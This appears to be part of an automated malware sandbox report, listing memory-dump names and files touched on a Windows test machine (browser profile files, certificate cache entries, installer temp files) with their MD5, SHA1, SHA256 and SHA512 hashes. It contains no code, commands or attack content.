
memory/6976-3262-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3260-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3258-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3256-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3254-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3252-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3250-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f35f9c67db84c73959e41005430647ca
SHA1 db674c89fff04a747d6ddfe406e0d14245cdbc57
SHA256 3efbf072e66320556fb8d30ecb39741769e2d3198424d5dfc302dbcbbaba9ace
SHA512 f6dbdbfe7183b957bb95b9fcc440104b7359213c8a681bb5e173761697d531d79c180463845748da82e55bfdfebe027c864b94add5571ed745b67a7ffd17a294

memory/6976-3248-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3246-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3244-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3242-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3240-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3238-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3237-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-7287-0x0000026ADFF30000-0x0000026ADFF86000-memory.dmp

memory/6976-7288-0x0000026ADFF90000-0x0000026ADFFDC000-memory.dmp

memory/7320-7289-0x000000001D1B0000-0x000000001D200000-memory.dmp

memory/7320-7290-0x000000001D6D0000-0x000000001D782000-memory.dmp

memory/7320-7298-0x000000001D500000-0x000000001D512000-memory.dmp

memory/7320-7299-0x000000001D560000-0x000000001D59C000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 2f8944a8ce96ca5be159ceb0f66bf27a
SHA1 ee0402012a08788ec2108454fb583d47b0553a2f
SHA256 205c7fabad4fa0823b3e807e238e903ff64d0a79de09358245fe53465e3b7bad
SHA512 8d67f1f72d9fc83a9f19dad73ab03540321124b3cac9343fc27f7a3ee39dc78c4dfda7de3fab63dabdd9fc100695d58c7b59ac013ef3793aad81f4cc43994b69

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 a551ba8afa731e7b1b5c281642165963
SHA1 bd00efe325e5a58c8de06b08359efa9bb1be33c6
SHA256 9771f4a628356d739a9d57eacaa442f58f06e16c6c698a8758aa812c258c1605
SHA512 7a328616c11f6d63a412f476b759ca311f605def72415c9d6d16a30a3a3426ae143be5f6ddb699d9035c7bdd3d8f586178a05336324df605718202679ce6b296

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 8cb7d2a6ade0c8205a3db98f3a72cc27
SHA1 30e5a37438b1e55f2c5ffd09caf2a187c09a12a2
SHA256 87bff88a0e1c4870260afd353410de68e0f611d0373442c29583b3833fc9390b
SHA512 883ed30602994b7826e3ad59b7046226152acde26dd1fe5b2c08ac3bb1ace96af0684b58c91923e4b34cd350ab955f42ea3c23cacab62bffc5711c180865fc77

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 225f634799661a92b759c7cb706c33f7
SHA1 03b069cf22626b490eeb47311e60b4fc047b0e0e
SHA256 4be3406fce2e96efc8b362ecf563e2c08984ddd60754742d1ac77d444a3a6b39
SHA512 544d3e36ab50d43ad504c93ab71d05619f2eba30ab8ab0ba26cdc30fe2c7fb381379433ce603e6126e85ff269d22f49d92395ab79fa19dce0dc0fabdfd6cd64b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 2061b02f46473bac3dc4f197beed1958
SHA1 8ba01abcae3db0b2492631f63688da2cd9642210
SHA256 8536790f45c77d08096dcf83a4adf45a89b60c0f04ea150fac4ecbc1c0562470
SHA512 2f59755bb955cd7c8d735654dacda65870a301c9c967637eb8ba7872839c6169ac0624d4b9f865a91158165b59440f0d17c3c6e21e4a7f3b3774971172c5fb30

memory/7612-7449-0x0000000000560000-0x0000000000A22000-memory.dmp

memory/7608-7450-0x0000000000220000-0x00000000006CA000-memory.dmp

memory/7612-7453-0x0000000000560000-0x0000000000A22000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3AA0DCD5A74331FBD6F344550EC48B87_D7025277F003EE88ED342C67F3525784

MD5 720c16d391ef70c6fe4742de4f2dae76
SHA1 89e1e7bcdbb8befea64211884e91f3f1d5ec3ade
SHA256 8d862f89114cdae890efecef58c12e3b46eaca6ffe9076c0bf35e70fe23110ce
SHA512 a5ab9f919af951d0fd05ae88188ec344ceb451e7568e1ebe8865482aeeeb7b94790b807250fc768dc5ab734c58794eae4a476edf64826c0b446a27f06e91ac76

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3AA0DCD5A74331FBD6F344550EC48B87_D7025277F003EE88ED342C67F3525784

MD5 44a17c6abfbf1bd2f3d39c0e44a166e4
SHA1 c3eca667e0a555c441f12b3e8315d79f5511709e
SHA256 84a98da603b8680a3927df7b9d7777910035640453b49a36108d7eaee2ae2986
SHA512 e6369ff7aa279c33a38d6cb1cb1174e82b807ac3296c4c49a127b6d5befad2280f891e9470072d0e0a3027db8963789305d6813260d630a5b90923f39937c124

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\18E6B4A57A6BC7EC9B861CDF2D6D0D02_EF52C1EC85F21F31CC0157A5C8803013

MD5 f1382455206b34aa38e2d8dd182fb525
SHA1 1a6a03acfd3dc66eae8e8d4ca47d07cda5cabf60
SHA256 18d04aad7e1875b8c0e8a77ced64abfa907a2cfe4d37d4ae79f25d1731bbd8e5
SHA512 edd7e0b5164be4df5c87b11e1e2bc8021bc1ba44cce39c828b6cd07fb1454772a1a8a1ed35c0068f4259ff62d1347344d3dc292b8b8470c50b38f18a35d29036

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\18E6B4A57A6BC7EC9B861CDF2D6D0D02_EF52C1EC85F21F31CC0157A5C8803013

MD5 9b1f0190b84a3a3ff7cdbcb6afdc3732
SHA1 3daa3676cf19ff9276a50442f8a3c2a3bc92bb78
SHA256 b6a9cee6e07d4efe1e6142a0391a15c41b3e1d30cd91d4e76928493ca3200e79
SHA512 dfcdb5730e674b3b27a42957f87e66b831c248f5a5a52dec472677db44f1c2b70ba48eebac1a0c82f51fe1cbfde21136d6429249c7aa51a1f1421e4d1e8cca51

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_93702E680A5530C052C8D2BA33A2225F

MD5 c1657c09cbf653085fe5977265c03e1d
SHA1 304d2bd99d40aa426d2620893045e7c8805f3906
SHA256 3e9b4e775c00a2fd2b1db9d5c7b4e83d6df7f3683aaba7283a8137248dad751a
SHA512 73cb77912b1482f76e4b5a091dac1f83401673f64973e458ab0a8184aba41f3c0560950c26941ea952a02cf2cde9722de726313a8820fd5daa07e06c97344f4a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_93702E680A5530C052C8D2BA33A2225F

MD5 59c29597ffe187200d0926958403858a
SHA1 ec950c9a688f1de842f08809dc2a687f9dff52dc
SHA256 67ef6c4eb51417344dbb32014e263ffac7d4f12d72c0e0d11f5ab6f597ada6dd
SHA512 626a5d96163870847bae47102c466ceff4622aeb2a38851f90efe0eab7d5c4d9addab38991f26aa0a1a8a7a41caa8131b5fbbd8dfeb29ce127130d7a7dbc91af

C:\Windows\Installer\MSI61D.tmp

MD5 82d54afa53f6733d6529e4495700cdd8
SHA1 b3e578b9edde7aaaacca66169db4f251ee1f06b3
SHA256 8f4894b9d19bfe5d8e54b5e120cef6c69abea8958db066cdd4905cc78ecd58b6
SHA512 22476e0f001b6cf37d26e15dfb91c826c4197603ea6e1fbb9143c81392e41f18fa10a2d2d1e25425baaf754bff7fd179ef1df34966c10985e16d9da12a445150

C:\Windows\Installer\MSI65D.tmp

MD5 d53b2b818b8c6a2b2bae3a39e988af10
SHA1 ee57ec919035cf8125ee0f72bd84a8dd9e879959
SHA256 2a81878be73b5c1d7d02c6afc8a82336d11e5f8749eaacf54576638d81ded6e2
SHA512 3aaf8b993c0e8f8a833ef22ed7b106218c0f573dcd513c3609ead4daf90d37b7892d901a6881e1121f1900be3c4bbe9c556a52c41d4a4a5ec25c85db7f084d5e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7drp4u9j.default-release\datareporting\glean\db\data.safe.tmp

MD5 1f6d94ba2637b42ef68477c33359b8ba
SHA1 9952e146a7be42d43e82ab99b021ed1bf9d58409
SHA256 a6c73296d50476b5b35f3f01bf17547fe63279bf0f5123aa62b883933d59e10a
SHA512 fb9814a3f3fb7203c2a56463777fd747e5f50ffa5779e1b0245f9c2cf863d78e23942aa17d8024ba64961f94de08d0736bc384f2047884335aad9930bfe89ed9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 588c5082be344df0a891406e9f4eb9a3
SHA1 e0e9ac0c9202b83bcef7c49fde7c1a083721c102
SHA256 66a21f13a10e623a7bec79a7e40edcc6064f3aa8f57980ea725970ce15adfce3
SHA512 b43a090b47af0ac40c6fd4688a7b2ed246f11d37a279b854ecc62c44230b682871a169b6fb00af574c88a1f1926b86e19b4c85a01f0d922fbc20617b41b4ebcf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 799f22013c262f979217cd1b40516940
SHA1 c20082dc1c4e9cce62d5eba9440c6b92b9f3b929
SHA256 a9c14ce81fe3ffa91496f823156f2a94cde4ee1936b68968a2084143c06bb400
SHA512 28022ac607c9c3c56ca326802fc6c2c220fda3f2314b56816520468d4b6cc505c305aa78c057b654908707b292528f76545cf7dd906e24272a4ce6504146f205